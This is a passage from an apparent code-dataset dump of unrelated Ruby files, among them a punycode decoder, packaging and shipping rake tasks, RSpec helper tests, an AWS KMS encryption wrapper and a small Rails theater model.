# UTF-8 (RFC 3492). Direct port of the C reference implementation;
# raises PunycodeBadInput / PunycodeBigOutput / PunycodeOverflow on the
# corresponding failure conditions.
def self.punycode_decode(punycode)
  input = []
  output = []

  if ACE_MAX_LENGTH * 2 < punycode.size
    raise PunycodeBigOutput, "Output would exceed the space provided."
  end
  punycode.each_byte do |c|
    unless c >= 0 && c <= 127
      raise PunycodeBadInput, "Input is invalid."
    end
    input.push(c)
  end

  input_length = input.length
  output_length = [UNICODE_MAX_LENGTH]

  # Initialize the state
  n = PUNYCODE_INITIAL_N

  out = i = 0
  max_out = output_length[0]
  bias = PUNYCODE_INITIAL_BIAS

  # Handle the basic code points: Let b be the number of input code
  # points before the last delimiter, or 0 if there is none, then
  # copy the first b code points to the output.

  b = 0
  input_length.times do |j|
    b = j if punycode_delimiter?(input[j])
  end
  if b > max_out
    raise PunycodeBigOutput, "Output would exceed the space provided."
  end

  b.times do |j|
    unless punycode_basic?(input[j])
      raise PunycodeBadInput, "Input is invalid."
    end
    output[out] = input[j]
    out+=1
  end

  # Main decoding loop: Start just after the last delimiter if any
  # basic code points were copied; start at the beginning otherwise.

  in_ = b > 0 ? b + 1 : 0
  while in_ < input_length

    # in_ is the index of the next character to be consumed, and
    # out is the number of code points in the output array.

    # Decode a generalized variable-length integer into delta,
    # which gets added to i. The overflow checking is easier
    # if we increase i as we go, then subtract off its starting
    # value at the end to obtain delta.

    oldi = i; w = 1; k = PUNYCODE_BASE
    while true
      if in_ >= input_length
        raise PunycodeBadInput, "Input is invalid."
      end
      digit = punycode_decode_digit(input[in_])
      in_+=1
      if digit >= PUNYCODE_BASE
        raise PunycodeBadInput, "Input is invalid."
      end
      if digit > (PUNYCODE_MAXINT - i) / w
        raise PunycodeOverflow, "Input needs wider integers to process."
      end
      i += digit * w
      # Threshold t clamps k - bias into [TMIN, TMAX].
      t = (
        if k <= bias
          PUNYCODE_TMIN
        elsif k >= bias + PUNYCODE_TMAX
          PUNYCODE_TMAX
        else
          k - bias
        end
      )
      break if digit < t
      if w > PUNYCODE_MAXINT / (PUNYCODE_BASE - t)
        raise PunycodeOverflow, "Input needs wider integers to process."
      end
      w *= PUNYCODE_BASE - t
      k += PUNYCODE_BASE
    end

    bias = punycode_adapt(i - oldi, out + 1, oldi == 0)

    # I was supposed to wrap around from out + 1 to 0,
    # incrementing n each time, so we'll fix that now:

    if i / (out + 1) > PUNYCODE_MAXINT - n
      raise PunycodeOverflow, "Input needs wider integers to process."
    end
    n += i / (out + 1)
    i %= out + 1

    # Insert n at position i of the output:
    # not needed for Punycode:
    # raise PUNYCODE_INVALID_INPUT if decode_digit(n) <= base
    if out >= max_out
      raise PunycodeBigOutput, "Output would exceed the space provided."
    end

    #memmove(output + i + 1, output + i, (out - i) * sizeof *output)
    output[i + 1, out - i] = output[i, out - i]
    output[i] = n
    i += 1

    out += 1
  end

  output_length[0] = out
  output.pack("U*")
end
(class <<self; private :punycode_decode; end)
# True for basic (ASCII, < U+0080) code points.
def self.punycode_basic?(codepoint)
  codepoint < 0x80
end
(class <<self; private :punycode_basic?; end)

# True when the code point is the punycode delimiter ('-').
def self.punycode_delimiter?(codepoint)
  codepoint == PUNYCODE_DELIMITER
end
(class <<self; private :punycode_delimiter?; end)
# Maps a digit value to its punycode basic code point:
# 0..25 -> 'a'..'z' (97..122), 26..35 -> '0'..'9' (48..57).
def self.punycode_encode_digit(d)
  offset = d < 26 ? 97 : 22
  d + offset
end
(class <<self; private :punycode_encode_digit; end)
# Returns the numeric value of a basic codepoint
# (for use in representing integers) in the range 0 to
# base - 1, or PUNYCODE_BASE if codepoint does not represent a value.
# ('0'-'9' map to 26..35; 'A'-'Z' and 'a'-'z' map to 0..25.)
def self.punycode_decode_digit(codepoint)
  if codepoint - 48 < 10
    codepoint - 22
  elsif codepoint - 65 < 26
    codepoint - 65
  elsif codepoint - 97 < 26
    codepoint - 97
  else
    PUNYCODE_BASE
  end
end
(class <<self; private :punycode_decode_digit; end)
# Bias adaptation method (RFC 3492 section 6.1): rescales delta after
# each output code point so later variable-length integers stay short.
def self.punycode_adapt(delta, numpoints, firsttime)
  delta = firsttime ? delta / PUNYCODE_DAMP : delta >> 1
  # delta >> 1 is a faster way of doing delta / 2
  delta += delta / numpoints

  difference = PUNYCODE_BASE - PUNYCODE_TMIN

  k = 0
  while delta > (difference * PUNYCODE_TMAX) / 2
    delta /= difference
    k += PUNYCODE_BASE
  end

  k + (difference + 1) * delta / (delta + PUNYCODE_SKEW)
end
(class <<self; private :punycode_adapt; end)
end
# :startdoc:
end
| 31.50295 | 78 | 0.556206 |
11226c8c770a47bc65529ec989f60fa26cd5402e | 370 | require 'mathpack/version'
require 'mathpack/statistics'
require 'mathpack/sample'
require 'mathpack/nonlinear_equations'
require 'mathpack/sle'
require 'mathpack/approximation'
require 'mathpack/integration'
require 'mathpack/io'
require 'mathpack/functions'
require 'mathpack/functional'
require 'mathpack/integral_equations'
require 'mathpack/differential_equations'
| 28.461538 | 41 | 0.837838 |
261565019d456f3a8d4cdb0f9b6598f002bfed65 | 1,362 | require 'azure_generic_resources'
class AzureMigrateProjectDatabases < AzureGenericResources
name 'azure_migrate_project_databases'
desc 'Verifies settings for a collection of Azure Migrate Project Databases for a Azure Migrate Project in a Resource Group'
example <<-EXAMPLE
describe azure_migrate_project_databases(resource_group: 'migrated_vms', project_name: 'zoneA_migrate_project') do
it { should exist }
end
EXAMPLE
def initialize(opts = {})
raise ArgumentError, 'Parameters must be provided in an Hash object.' unless opts.is_a?(Hash)
opts[:resource_provider] = specific_resource_constraint('Microsoft.Migrate/migrateProjects', opts)
opts[:required_parameters] = %i(project_name)
opts[:resource_path] = [opts[:project_name], 'databases'].join('/')
super(opts, true)
return if failed_resource?
populate_filter_table_from_response
end
def to_s
super(AzureMigrateProjectDatabases)
end
private
def populate_table
@resources.each do |resource|
resource = resource.merge(resource[:properties])
assessment_data_hash = resource[:assessmentData].each_with_object(Hash.new { |h, k| h[k] = [] }) do |assessment_data, hash|
assessment_data.each_pair { |key, value| hash[key] << value }
end
@table << resource.merge(assessment_data_hash)
end
end
end
| 34.05 | 129 | 0.736417 |
398f4c40e23034eb8f515e941eea1e1c13b192ee | 146 | require 'mxx_ru/cpp'
# Mxx_ru build script: declares the executable target for the
# prepared_select SObjectizer benchmark.
MxxRu::Cpp::exe_target {
  # Depend on the main so_5 library project.
  required_prj 'so_5/prj.rb'

  target '_test.bench.so_5.prepared_select'

  cpp_source 'main.cpp'
}
| 13.272727 | 42 | 0.732877 |
33e80a07381f5d4219e34d5efab6eaf591db3626 | 1,346 | require "spec_helper"
describe "modular-scale" do
before(:all) do
ParserSupport.parse_file("library/modular-scale")
end
context "called with arguments (1, $value: 2em)" do
it "outputs double the first value from the default scale" do
expect(".one-base-two").to have_rule("font-size: 2.5em")
end
end
context "called with arguments (1, $value: 3em)" do
it "outputs triple the first value from the default scale" do
expect(".one-base-three").to have_rule("font-size: 3.75em")
end
end
context "called with arguments (1, $value: 4em 6em)" do
it "outputs quadruple the first value from the default scale" do
expect(".one-double-value").to have_rule("font-size: 1.024em")
end
end
context "called with arguments (1, $ratio: $golden-ratio)" do
it "output the first value from the golden ratio scale" do
expect(".one-golden-ratio").to have_rule("font-size: 1.618em")
end
end
context "called with argument (2)" do
it "outputs the second value from the default scale" do
expect(".two-base-one").to have_rule("font-size: 1.5625em")
end
end
context "called with arguments (2, $value: 4em 6em)" do
it "outputs sextuple the second value from the default scale" do
expect(".two-double-value").to have_rule("font-size: 3.125em")
end
end
end
| 30.590909 | 68 | 0.677563 |
7ab3c5bccaf3fa7555c3727e2046aa1f3344ce81 | 8,489 | namespace :pl do
desc "Ship mocked rpms to #{Pkg::Config.yum_host}"
task :ship_rpms do
["el", "fedora"].each do |dist|
retry_on_fail(:times => 3) do
pkgs = Dir["pkg/#{dist}/**/*.rpm"].map { |f| "'#{f.gsub("pkg/#{dist}/", "#{Pkg::Config.yum_repo_path}/#{dist}/")}'"}
unless pkgs.empty?
rsync_to("pkg/#{dist}", Pkg::Config.yum_host, Pkg::Config.yum_repo_path)
remote_set_immutable(Pkg::Config.yum_host, pkgs)
end
end if File.directory?("pkg/#{dist}")
end
end
namespace :remote do
# These hacky bits execute a pre-existing rake task on the Pkg::Config.apt_host
# The rake task takes packages in a specific directory and freights them
# to various target yum and apt repositories based on their specific type
# e.g., final vs devel vs PE vs FOSS packages
desc "Update remote rpm repodata on #{Pkg::Config.yum_host}"
task :update_yum_repo do
STDOUT.puts "Really run remote repo update on #{Pkg::Config.yum_host}? [y,n]"
if ask_yes_or_no
remote_ssh_cmd(Pkg::Config.yum_host, 'rake -f /opt/repository/Rakefile mk_repo')
end
end
desc "remote freight packages to repos on #{Pkg::Config.apt_host}"
task :freight do
STDOUT.puts "Really run remote freight command on #{Pkg::Config.apt_host}? [y,n]"
if ask_yes_or_no
override = "OVERRIDE=1" if ENV['OVERRIDE']
remote_ssh_cmd(Pkg::Config.apt_host, "rake -f /opt/repository/Rakefile freight #{override}")
end
end
end
desc "Ship cow-built debs to #{Pkg::Config.apt_host}"
task :ship_debs do
retry_on_fail(:times => 3) do
if File.directory?("pkg/deb")
rsync_to('pkg/deb/', Pkg::Config.apt_host, Pkg::Config.apt_repo_path)
end
end
end
namespace :remote do
end
desc "Update remote ips repository on #{Pkg::Config.ips_host}"
task :update_ips_repo do
rsync_to('pkg/ips/pkgs/', Pkg::Config.ips_host, Pkg::Config.ips_store)
remote_ssh_cmd(Pkg::Config.ips_host, "pkgrecv -s #{Pkg::Config.ips_store}/pkgs/#{Pkg::Config.project}Pkg::Config.#{Pkg::Config.ipsversion}.p5p -d #{Pkg::Config.ips_repo} \\*")
remote_ssh_cmd(Pkg::Config.ips_host, "pkgrepo refresh -s #{Pkg::Config.ips_repo}")
remote_ssh_cmd(Pkg::Config.ips_host, "/usr/sbin/svcadm restart svc:/application/pkg/server")
end if Pkg::Config.build_ips
desc "Upload ips p5p packages to downloads"
task :ship_ips => 'pl:fetch' do
if Dir['pkg/ips/pkgs/**/*'].empty?
STDOUT.puts "There aren't any p5p packages in pkg/ips/pkgs. Maybe something went wrong?"
else
rsync_to('pkg/ips/pkgs/', Pkg::Config.ips_package_host, Pkg::Config.ips_path)
end
end if Pkg::Config.build_ips
# We want to ship a gem only for projects that build gems
if Pkg::Config.build_gem
desc "Ship built gem to rubygems"
task :ship_gem do
# Even if a project builds a gem, if it uses the odd_even or zero-based
# strategies, we only want to ship final gems because otherwise a
# development gem would be preferred over the last final gem
if Pkg::Config.version_strategy !~ /odd_even|zero_based/ || Pkg::Util::Version.is_final?
FileList["pkg/#{Pkg::Config.gem_name}-#{Pkg::Config.gemversion}*.gem"].each do |f|
puts "Shipping gem #{f} to rubygems"
ship_gem(f)
end
else
STDERR.puts "Not shipping development gem using odd_even strategy for the sake of your users."
end
end
end
desc "ship apple dmg to #{Pkg::Config.yum_host}"
task :ship_dmg => 'pl:fetch' do
retry_on_fail(:times => 3) do
rsync_to('pkg/apple/*.dmg', Pkg::Config.yum_host, Pkg::Config.dmg_path)
end
end if Pkg::Config.build_dmg
desc "ship tarball and signature to #{Pkg::Config.tar_host}"
task :ship_tar => 'pl:fetch' do
retry_on_fail(:times => 3) do
rsync_to("pkg/#{Pkg::Config.project}-#{Pkg::Config.version}.tar.gz*", Pkg::Config.tar_host, Pkg::Config.tarball_path)
end
end
desc "UBER ship: ship all the things in pkg"
task :uber_ship => 'pl:fetch' do
if confirm_ship(FileList["pkg/**/*"])
ENV['ANSWER_OVERRIDE'] = 'yes'
Rake::Task["pl:ship_gem"].invoke if Pkg::Config.build_gem
Rake::Task["pl:ship_rpms"].invoke
Rake::Task["pl:ship_debs"].invoke
Rake::Task["pl:ship_dmg"].execute if Pkg::Config.build_dmg
Rake::Task["pl:ship_tar"].execute
Rake::Task["pl:jenkins:ship"].invoke("shipped")
add_shipped_metrics(:pe_version => ENV['PE_VER'], :is_rc => (! Pkg::Util::Version.is_final?)) if Pkg::Config.benchmark
post_shipped_metrics if Pkg::Config.benchmark
else
puts "Ship canceled"
exit
end
end
# It is odd to namespace this ship task under :jenkins, but this task is
# intended to be a component of the jenkins-based build workflow even if it
# doesn't interact with jenkins directly. The :target argument is so that we
# can invoke this task with a subdirectory of the standard distribution
# server path. That way we can separate out built artifacts from
# signed/actually shipped artifacts e.g. $path/shipped/ or $path/artifacts.
namespace :jenkins do
desc "Ship pkg directory contents to distribution server"
task :ship, :target do |t, args|
invoke_task("pl:fetch")
target = args.target || "artifacts"
artifact_dir = "#{Pkg::Config.jenkins_repo_path}/#{Pkg::Config.project}/#{Pkg::Config.ref}/#{target}"
# In order to get a snapshot of what this build looked like at the time
# of shipping, we also generate and ship the params file
#
Pkg::Config.config_to_yaml('pkg')
# Sadly, the packaging repo cannot yet act on its own, without living
# inside of a packaging-repo compatible project. This means in order to
# use the packaging repo for shipping and signing (things that really
# don't require build automation, specifically) we still need the project
# clone itself.
git_bundle('HEAD', 'signing_bundle', 'pkg')
# While we're bundling things, let's also make a git bundle of the
# packaging repo that we're using when we invoke pl:jenkins:ship. We can
# have a reasonable level of confidence, later on, that the git bundle on
# the distribution server was, in fact, the git bundle used to create the
# associated packages. This is because this ship task is automatically
# called upon completion each cell of the pl:jenkins:uber_build, and we
# have --ignore-existing set below. As such, the only git bundle that
# should possibly be on the distribution is the one used to create the
# packages.
# We're bundling the packaging repo because it allows us to keep an
# archive of the packaging source that was used to create the packages,
# so that later on if we need to rebuild an older package to audit it or
# for some other reason we're assured that the new package isn't
# different by virtue of the packaging automation.
if defined?(PACKAGING_ROOT)
packaging_bundle = ''
cd PACKAGING_ROOT do
packaging_bundle = git_bundle('HEAD', 'packaging-bundle')
end
mv(packaging_bundle, 'pkg')
end
retry_on_fail(:times => 3) do
remote_ssh_cmd(Pkg::Config.distribution_server, "mkdir -p #{artifact_dir}")
end
retry_on_fail(:times => 3) do
ignore_existing = "--ignore-existing"
rsync_to("pkg/", Pkg::Config.distribution_server, "#{artifact_dir}/ #{ignore_existing} --exclude repo_configs")
end
# If we just shipped a tagged version, we want to make it immutable
files = Dir.glob("pkg/**/*").select { |f| File.file?(f) }.map do |file|
"#{artifact_dir}/#{file.sub(/^pkg\//,'')}"
end
remote_set_immutable(Pkg::Config.distribution_server, files)
end
desc "Ship generated repository configs to the distribution server"
task :ship_repo_configs do
Pkg::Util::File.empty_dir?("pkg/repo_configs") and fail "No repo configs have been generated! Try pl:deb_repo_configs or pl:rpm_repo_configs"
invoke_task("pl:fetch")
repo_dir = "#{Pkg::Config.jenkins_repo_path}/#{Pkg::Config.project}/#{Pkg::Config.ref}/repo_configs"
remote_ssh_cmd(Pkg::Config.distribution_server, "mkdir -p #{repo_dir}")
retry_on_fail(:times => 3) do
rsync_to("pkg/repo_configs/", Pkg::Config.distribution_server, repo_dir)
end
end
end
end
| 43.984456 | 179 | 0.673813 |
39019a6dca2bfa363579fea8378aac40abd704fc | 13,823 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ArclightHelper, type: :helper do
describe '#collection_active?' do
context 'with active collection search' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'f' => { 'level_sim' => ['Collection'] } }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.collection_active?).to eq true
end
end
context 'without active collection search' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: {}
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.collection_active?).to eq false
end
end
end
describe '#grouped?' do
context 'when group is active' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'group' => 'true' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.grouped?).to be_truthy
end
end
context 'when not grouped' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'hello' => 'true' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.grouped?).to be_falsey
end
end
end
describe '#search_with_group' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'q' => 'hello', 'page' => '2' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.search_with_group).to eq(
'q' => 'hello',
'group' => 'true'
)
end
end
describe '#search_without_group' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'q' => 'hello', 'group' => 'true', 'page' => '2' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.search_without_group).to eq(
'q' => 'hello'
)
end
end
describe '#on_repositories_index?' do
before { allow(helper).to receive(:action_name).twice.and_return('index') }
context 'with repositories index' do
it do
allow(helper).to receive(:controller_name).twice.and_return('repositories')
expect(helper.on_repositories_index?).to eq true
expect(helper.repositories_active_class).to eq 'active'
end
end
context 'without repositories index' do
it do
allow(helper).to receive(:controller_name).twice.and_return('NOT repositories')
expect(helper.on_repositories_index?).to eq false
expect(helper.repositories_active_class).to eq nil
end
end
end
describe '#on_repositories_show?' do
before { allow(helper).to receive(:action_name).twice.and_return('show') }
context 'with repositories show' do
it do
allow(helper).to receive(:controller_name).twice.and_return('repositories')
expect(helper.on_repositories_show?).to eq true
expect(helper.repositories_active_class).to eq nil
end
end
context 'without repositories show' do
it do
allow(helper).to receive(:controller_name).twice.and_return('NOT repositories')
expect(helper.on_repositories_show?).to eq false
expect(helper.repositories_active_class).to eq nil
end
end
end
describe '#collection_count' do
context 'when there are items' do
it 'returns the item count from the Blacklight::Solr::Response' do
assign(:response, instance_double('Response', response: { 'numFound' => 2 }))
expect(helper.collection_count).to eq 2
end
end
context 'when there are no items' do
it do
assign(:response, instance_double('Response', response: {}))
expect(helper.collection_count).to be_nil
end
end
end
describe '#fields_have_content?' do
before do
expect(helper).to receive_messages(
blacklight_config: CatalogController.blacklight_config,
blacklight_configuration_context: Blacklight::Configuration::Context.new(helper)
)
end
context 'when the configured fields have content' do
let(:document) { SolrDocument.new('acqinfo_ssm': ['Data']) }
it 'is true' do
expect(helper.fields_have_content?(document, :background_field)).to eq true
end
end
context 'when the configured fields have no content' do
let(:document) { SolrDocument.new }
it 'is true' do
expect(helper.fields_have_content?(document, :background_field)).to eq false
end
end
end
describe '#parents_to_links' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'converts "parents" from SolrDocument to links' do
expect(helper.parents_to_links(document)).to include 'my repository'
expect(helper.parents_to_links(document)).to include 'DEF'
expect(helper.parents_to_links(document)).to include solr_document_path('abc123def')
expect(helper.parents_to_links(document)).to include 'GHI'
expect(helper.parents_to_links(document)).to include solr_document_path('abc123ghi')
end
it 'properly delimited' do
expect(helper.parents_to_links(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.parents_to_links(SolrDocument.new)).not_to include '»'
end
end
describe '#component_parents_to_links' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi jkl],
parent_unittitles_ssm: %w[DEF GHI JKL],
ead_ssi: 'abc123'
)
end
it 'converts component "parents" from SolrDocument to links' do
expect(helper.component_parents_to_links(document)).not_to include 'DEF'
expect(helper.component_parents_to_links(document)).not_to include solr_document_path('abc123def')
expect(helper.component_parents_to_links(document)).to include 'GHI'
expect(helper.component_parents_to_links(document)).to include solr_document_path('abc123ghi')
end
it 'properly delimited' do
expect(helper.component_parents_to_links(document)).to include '<span aria-hidden="true"> » </span>'
end
end
describe '#regular_compact_breadcrumbs' do
context 'when the component only has one parent (meaning it is a top level parent)' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def],
parent_unittitles_ssm: %w[DEF],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'links to repository and top level component and does not include an ellipsis' do
expect(helper.regular_compact_breadcrumbs(document)).to include 'my repository'
expect(helper.regular_compact_breadcrumbs(document)).to include 'DEF'
expect(helper.regular_compact_breadcrumbs(document)).to include solr_document_path('abc123def')
expect(helper.regular_compact_breadcrumbs(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.regular_compact_breadcrumbs(document)).not_to include '…'
end
end
context 'when the component is a child of a top level component' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'links to the top level component and does include an ellipsis' do
expect(helper.regular_compact_breadcrumbs(document)).to include 'DEF'
expect(helper.regular_compact_breadcrumbs(document)).to include solr_document_path('abc123def')
expect(helper.regular_compact_breadcrumbs(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.regular_compact_breadcrumbs(document)).to include '…'
end
end
end
describe '#component_top_level_parent_to_links' do
context 'when the component only has one parent (meaning it is a top level parent)' do
let(:document) do
SolrDocument.new(parent_ssm: %w[def], parent_unittitles_ssm: %w[DEF], ead_ssi: 'abc123')
end
it { expect(helper.component_top_level_parent_to_links(document)).to be_nil }
end
context 'when the component is a child of a top level component' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123'
)
end
it 'links to the top level component and does not include an ellipsis' do
expect(helper.component_top_level_parent_to_links(document)).to include 'GHI'
expect(helper.component_top_level_parent_to_links(document)).to include solr_document_path('abc123ghi')
expect(helper.component_top_level_parent_to_links(document)).not_to include '»'
expect(helper.component_top_level_parent_to_links(document)).not_to include '…'
end
end
context 'when the component is several levels deep' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi jkl],
parent_unittitles_ssm: %w[DEF GHI JKL],
ead_ssi: 'abc123'
)
end
it 'links to the top level component and joins it with an ellipsis' do
expect(helper.component_top_level_parent_to_links(document)).to include 'GHI'
expect(helper.component_top_level_parent_to_links(document)).to include solr_document_path('abc123ghi')
expect(helper.component_top_level_parent_to_links(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.component_top_level_parent_to_links(document)).to include '…'
end
end
end
describe '#search_results_header_text' do
let(:text) { helper.search_results_header_text }
context 'when searching within a repository' do
before do
expect(helper).to receive_messages(
repository_faceted_on: instance_double('Arclight::Repostory', name: 'Repository Name')
)
end
it { expect(text).to eq 'Collections : [Repository Name]' }
end
context 'when searching all collections' do
before do
expect(helper).to receive_messages(
search_state: instance_double(
'Blacklight::SearchState', params_for_search: { 'f' => { 'level_sim' => ['Collection'] } }
),
facet_field_in_params?: false
)
end
it { expect(text).to eq 'Collections' }
end
context 'all other non-special search behavior' do
it { expect(text).to eq 'Search' }
end
end
describe 'document_or_parent_icon' do
let(:document) { SolrDocument.new('level_ssm': ['collection']) }
it 'properly assigns the icon' do
expect(helper.document_or_parent_icon(document)).to eq 'collection'
end
context 'there is no level_ssm' do
let(:document) { SolrDocument.new }
it 'gives the default icon' do
expect(helper.document_or_parent_icon(document)).to eq 'container'
end
end
end
describe 'custom field accessors' do
let(:accessors) { Arclight::Engine.config.catalog_controller_field_accessors }
let(:field) { :yolo }
describe '#document_config_fields' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"document_#{accessor}s"
end
end
end
describe '#render_document_config_field_label' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"render_document_#{accessor}_label"
end
end
end
describe '#document_config_field_label' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"document_#{accessor}_label"
end
end
end
describe '#should_render_config_field?' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"should_render_#{accessor}?"
end
end
end
describe '#generic_document_fields' do
it 'send along the method call' do
expect(helper).to receive_messages(document_yolos: nil)
helper.generic_document_fields(field)
end
end
describe '#generic_should_render_field?' do
it 'send along the method call' do
expect(helper).to receive_messages(should_render_yolo?: nil)
helper.generic_should_render_field?(field, 0, 1)
end
end
describe '#generic_render_document_field_label?' do
it 'send along the method call' do
expect(helper).to receive_messages(render_document_yolo_label: nil)
helper.generic_render_document_field_label(field, 0, field: 1)
end
end
end
describe '#hierarchy_component_context?' do
it 'requires a parameter to enable' do
allow(helper).to receive(:params).and_return(hierarchy_context: 'component')
expect(helper.hierarchy_component_context?).to be_truthy
end
it 'omission is disabled' do
allow(helper).to receive(:params).and_return({})
expect(helper.hierarchy_component_context?).to be_falsey
end
end
end
| 32.833729 | 117 | 0.662808 |
b9e1bf1344f82f4b8251a43827cc2aa7aa3c6b8e | 1,278 | module BuildComms
class KMS
class << self
def client
@client || @client = Aws::KMS::Client.new
end
def get_key key, context=nil
opts = {
:key_id => "alias/#{key}",
:key_spec => "AES_256"
}
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
response = client.generate_data_key(opts)
{ :enc_key => Base64.strict_encode64(response.ciphertext_blob), :key => response.plaintext }
end
def encrypt key, data, context=nil
opts = {
:key_id => "alias/#{key}",
:plaintext => data
}
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
Base64.strict_encode64(client.encrypt(opts).ciphertext_blob)
end
def decrypt data, context=nil
opts = { :ciphertext_blob => Base64.strict_decode64(data) }
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
client.decrypt(opts).plaintext
end
private
def to_hash val
if !val.is_a?(Hash)
val = { :context => val }
end
Hash[val.map{ |k, v| [k.to_s, v.to_s] }]
end
end
end
end
| 22.034483 | 100 | 0.535211 |
268462b7b2678dff746ffe9ac138e993c5e17407 | 1,331 | class Theater < ApplicationRecord
has_many :shows
def self.create_theaters
Theater.destroy_all # delete this line later
paramount = Theater.new
paramount.location = "911 Pine St, Seattle, WA 98101"
paramount.name = "The Paramount Theater"
paramount.klass = "Paramount"
paramount.save
paramount.updated_at = Time.now.utc - 90000
paramount.save
the5th = Theater.new
the5th.location = "1308 5th Ave, Seattle, WA 98101"
the5th.name = "The 5th Avenue Theater"
the5th.klass = "TheFifthAvenueTheater"
the5th.save
the5th.updated_at = Time.now.utc - 90000
the5th.save
sct = Theater.new
sct.location = "201 Thomas St, Seattle, WA 98109"
sct.name = "Seattle Children's Theater"
sct.klass = "SeattleChildrensTheater"
sct.save
sct.updated_at = Time.now.utc - 90000
sct.save
end
def self.find_by_name(name)
find_by(name: name)
end
def self.scrape
end
def self.find_by_name(name)
self.all.detect {|theater| theater.name == name}
end
def get_shows_by_name
shows.map {|show| show.name}
end
def get_shows_by_month(month)
self.shows.map {|show| array << show if show.show_month_includes?(month)}
end
end
# maybe add find or create theaters so that they don't have to be manually loaded in case of new db?
| 23.350877 | 100 | 0.691961 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.